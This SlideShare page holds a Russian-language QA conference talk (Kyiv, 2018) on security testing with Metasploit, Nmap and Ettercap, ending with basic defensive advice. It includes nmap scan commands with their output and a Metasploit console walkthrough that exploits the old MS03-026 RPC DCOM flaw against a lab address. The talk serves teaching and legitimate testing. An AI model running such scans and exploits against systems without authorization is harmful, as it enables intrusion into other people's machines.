Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
WITH PASSION TO QUALITY
Святослав Логин
QA CONFERENCE #1 IN UKRAINE, KYIV 2018
Что такое Metasploit? Как его использовать
...
О себе:
- Святослав Логин
- QA Lead в Evo.company
- 5 лет в тестировании
- 6 проектов
В evo.company входят такие проекты:
Сегодня в программе:
- Metasploit
- Nmap
- Ettercap
Вступление Знакомство с инструментами
Вступление Вступление: Работа злоумышленников
Hardware
OS
Soft
WEB Сервер
Вступление: Что такое Metasploit?
Metasploit - проект, посвященный
информационной безопасности.
Вступление: База Exploit
38.000+ EXPLOITS
● OS
● DB
● Soft
● Hardware
Вступление: Термины
Вступление: Умение Metasploit?
● Проводить установку к shell или VNC cерверу
● Шифровать shellcode, скрывая атаки
Вступление: Способы проникновения
Harry!!!
I come in
● Метод черного ящика
● Метод белого ящика
Вступление: Ключевые шаги
● Определение цели
Вступление: Ключевые шаги
● Выявление уязвимости
Вступление: Ключевые шаги
● Эксплуатация уязвимости
Вступление: Ключевые шаги
● Отчет
Глава1 Сбор информации о цели
Глава 1: Способы сбора информации
Нормальный мужик
долго на дороге не валяется
● Пассивный сбор информации
Глава 1: Пассивный сбор информации
● Команда whois
Глава 1: Пассивный сбор информации
● Команда dig
Глава 1: Пассивный сбор информации
● Команда nslookup
Глава 1: Способы сбора информации
● Активный сбор информации
Глава 1: Активный сбор информации
Nmap - утилита предназначенная для разнообразного
сканирования IP-сетей с любым количест...
Глава 1: Активный сбор информации
1.Команда TCP connect [-sT]
1 nmap -sT -p1-20 test.net
2 Starting Nmap 7.60 ( https://nm...
Глава 1: Активный сбор информации
2.Команда UDP scan [-sU]
1 nmap -sU test.net
2 Starting Nmap 7.60 ( https://nmap.org ) a...
Глава 1: Активный сбор информации
3.Команда ACK scan [-sA]
1 nmap -sА test.net
2 Starting Nmap 5.51SVN ( http://nmap.org )...
Глава 1: Активный сбор информации
4.Команда -O
1 nmap -O test.net
2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-1...
Глава 1: Способы сбора информации
● Социальная инженерия
Глава2 Эксплуатация уязвимости
Глава 3: Эксплуатация
Список команд
- search exploit
- use exploit
- set
- show targets, options
Глава 2: Запуск Metasploit
root@slogin: msfconsole
Глава 2: Эксплуатация
1.Команда search exploit
1 msf > search ms03_026_dcom
2 Matching Modules
3 ================
4 Name D...
Глава 2: Эксплуатация
2.Команда use
1 msf > use exploit/windows/dcerpc/ms03_026_dcom
2 msf exploit(ms03_026_dcom) >
Глава 2: Эксплуатация
3.Команда show options
1 msf exploit(ms03_026_dcom) > show options
2 Module options (exploit/windows...
Глава 2: Эксплуатация
4.Команда set
1 msf exploit(ms03_026_dcom) > set RHOST 102.168.56.102
2 RHOST =>102.168.56.102
3 msf...
Глава 2: Эксплуатация
5.Команда show targets
1 msf exploit(ms03_026_dcom) > show targets
2 Exploit targets:
3 Id Name
4 --...
Глава 3: Примеры
1 msf exploit(ms03_026_dcom) > exploit
2 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
3 ...
Глава3 Практика
Глава 3: Цепочка развитий событий Base
DB DBn
OS R file
W file
User
Up user
Net
RAM
Глава4
Глава 4: Как узнать IP
Ettercap — это приложение для анализа
сетевого трафика, проходящего через интерфейс
компьютера, но ...
Глава 4: Как узнать IP компа
Глава 4: Как узнать IP компа
Вывод: Как защититься
● Не позволяйте посторонним лицам иметь доступ в вашу сеть
● Помните об угрозе перехвата пароля
● Ис...
Вывод: Точка G
Security
Functionality
Usability
● База exploit - https://www.exploit-db.com/
● Nmap - https://nmap.org/man/ru/man-port-scanning-techniques.html
● ettercap...
Спасибо за внимание!
Вопросы?
svatogor
svyat.login@gmail.com
https://svyat.tech/
QA CONFERENCE #1 IN UKRAINE, KYIV 2018
WITH PASSION TO QUALITY
svyat.login@gmail.com
https://svyat.tech/
QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для проверки безопасности проекта?
QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для проверки безопасности проекта?
Upcoming SlideShare
Loading in …5
×

QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для проверки безопасности проекта?

1,107 views

Published on

Ни для кого не секрет, что при разработке проекта мало кто уделяет достаточное внимание проверке безопасности приложения. Даже когда и задумываются об этом, то очень часто упускают из внимания уязвимости железа и ОС, которое коммуницирует с вашим приложением. В своем докладе я расскажу и покажу на что следует обращать внимание при тестировании безопасности вашего продукта. А так же насколько важно применять тестирование безопасности. Ну, и как обычно, свои доклады я сопровождаю не только теорией, но и практическими примерами. На этот раз специальными гостями будут:
- Nmap
- Metasploit
- Ettercap

Published in: Education
  • Be the first to comment

  • Be the first to like this

QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для проверки безопасности проекта?

  1. 1. WITH PASSION TO QUALITY Святослав Логин QA CONFERENCE #1 IN UKRAINE, KYIV 2018 Что такое Metasploit? Как его использовать для проверки безопасности проекта?
  2. 2. О себе: - Святослав Логин - QA Lead в Evo.company - 5 лет в тестировании - 6 проектов
  3. 3. В evo.company входят такие проекты:
  4. 4. Сегодня в программе: - Metasploit - Nmap - Ettercap
  5. 5. Вступление Знакомство с инструментами
  6. 6. Вступление Вступление: Работа злоумышленников Hardware OS Soft WEB Сервер
  7. 7. Вступление: Что такое Metasploit? Metasploit - проект, посвященный информационной безопасности.
  8. 8. Вступление: База Exploit 38.000+ EXPLOITS ● OS ● DB ● Soft ● Hardware
  9. 9. Вступление: Термины
  10. 10. Вступление: Умение Metasploit? ● Проводить установку к shell или VNC cерверу ● Шифровать shellcode, скрывая атаки
  11. 11. Вступление: Способы проникновения Harry!!! I come in ● Метод черного ящика ● Метод белого ящика
  12. 12. Вступление: Ключевые шаги ● Определение цели
  13. 13. Вступление: Ключевые шаги ● Выявление уязвимости
  14. 14. Вступление: Ключевые шаги ● Эксплуатация уязвимости
  15. 15. Вступление: Ключевые шаги ● Отчет
  16. 16. Глава1 Сбор информации о цели
  17. 17. Глава 1: Способы сбора информации Нормальный мужик долго на дороге не валяется ● Пассивный сбор информации
  18. 18. Глава 1: Пассивный сбор информации ● Команда whois
  19. 19. Глава 1: Пассивный сбор информации ● Команда dig
  20. 20. Глава 1: Пассивный сбор информации ● Команда nslookup
  21. 21. Глава 1: Способы сбора информации ● Активный сбор информации
  22. 22. Глава 1: Активный сбор информации Nmap - утилита предназначенная для разнообразного сканирования IP-сетей с любым количеством объектов
  23. 23. Глава 1: Активный сбор информации 1.Команда TCP connect [-sT] 1 nmap -sT -p1-20 test.net 2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET 3 rDNS record for 193.239.68.38: www.test.net 4 PORT STATE SERVICE 5 1/tcp filtered tcpmux 6 2/tcp filtered compressnet 7 3/tcp filtered unknown
  24. 24. Глава 1: Активный сбор информации 2.Команда UDP scan [-sU] 1 nmap -sU test.net 2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET 3 rDNS record for 193.239.68.38: www.test.net 4 Not shown: 999 filtered ports 5 PORT STATE SERVICE 6 80/tcp open http 7 Nmap done: 1 IP address (1 host up) scanned in 5.01 seconds
  25. 25. Глава 1: Активный сбор информации 3.Команда ACK scan [-sA] 1 nmap -sА test.net 2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET 3 Nmap scan report for 192.168.56.102 4 Host is up (0.0011s latency). 5 Not shown: 999 filtered ports 6 9001/tcp unfiltered  tor-orport
  26. 26. Глава 1: Активный сбор информации 4.Команда -O 1 nmap -O test.net 2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET 3 Nmap scan report for test.net 4 Host is up (0.0014s latency). 5 MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems) 6 Device type: general purpose 7 Running: Microsoft Windows 7
  27. 27. Глава 1: Способы сбора информации ● Социальная инженерия
  28. 28. Глава2 Эксплуатация уязвимости
  29. 29. Глава 3: Эксплуатация Список команд - search exploit - use exploit - set - show targets, options
  30. 30. Глава 2: Запуск Metasploit root@slogin: msfconsole
  31. 31. Глава 2: Эксплуатация 1.Команда search exploit 1 msf > search ms03_026_dcom 2 Matching Modules 3 ================ 4 Name Disclosure Date Rank Description 5 ---- --------------- ---- ----------- 6 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC DCOM
  32. 32. Глава 2: Эксплуатация 2.Команда use 1 msf > use exploit/windows/dcerpc/ms03_026_dcom 2 msf exploit(ms03_026_dcom) >
  33. 33. Глава 2: Эксплуатация 3.Команда show options 1 msf exploit(ms03_026_dcom) > show options 2 Module options (exploit/windows/dcerpc/ms03_026_dcom): 3 Name Current Setting Required Description 4 ---- --------------- -------- ----------- 5 RHOST yes The target address 6 RHOST 125 yes The target port
  34. 34. Глава 2: Эксплуатация 4.Команда set 1 msf exploit(ms03_026_dcom) > set RHOST 102.168.56.102 2 RHOST =>102.168.56.102 3 msf exploit(ms03_026_dcom) >
  35. 35. Глава 2: Эксплуатация 5.Команда show targets 1 msf exploit(ms03_026_dcom) > show targets 2 Exploit targets: 3 Id Name 4 -- ---- 5 0 Windows NT SP3-6a/2000/XP/2003 Universal
  36. 36. Глава 3: Примеры 1 msf exploit(ms03_026_dcom) > exploit 2 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... 3 [*] Binding to 4d9f4ab8-7d1c-11cf-861e- 0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ... 4 [*] Bound to 4d9f4ab8-7d1c-11cf-861e- 0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ... 5 [*] Sending exploit ... 6 [*] Exploit completed.
  37. 37. Глава3 Практика
  38. 38. Глава 3: Цепочка развитий событий Base DB DBn OS R file W file User Up user Net RAM
  39. 39. Глава4
  40. 40. Глава 4: Как узнать IP Ettercap — это приложение для анализа сетевого трафика, проходящего через интерфейс компьютера, но с дополнительной функциональностью. http://viewdns.info https://iphostinfo.com/
  41. 41. Глава 4: Как узнать IP компа
  42. 42. Глава 4: Как узнать IP компа
  43. 43. Вывод: Как защититься ● Не позволяйте посторонним лицам иметь доступ в вашу сеть ● Помните об угрозе перехвата пароля ● Используйте VPN ● SSL-сертификаты ● Обновляйте все и вся ● Пользуйтесь лицензированным ПО
  44. 44. Вывод: Точка G Security Functionality Usability
  45. 45. ● База exploit - https://www.exploit-db.com/ ● Nmap - https://nmap.org/man/ru/man-port-scanning-techniques.html ● ettercap - https://www.ettercap-project.org/index.html Литература:
  46. 46. Спасибо за внимание! Вопросы? svatogor svyat.login@gmail.com https://svyat.tech/
  47. 47. QA CONFERENCE #1 IN UKRAINE, KYIV 2018 WITH PASSION TO QUALITY svyat.login@gmail.com https://svyat.tech/

×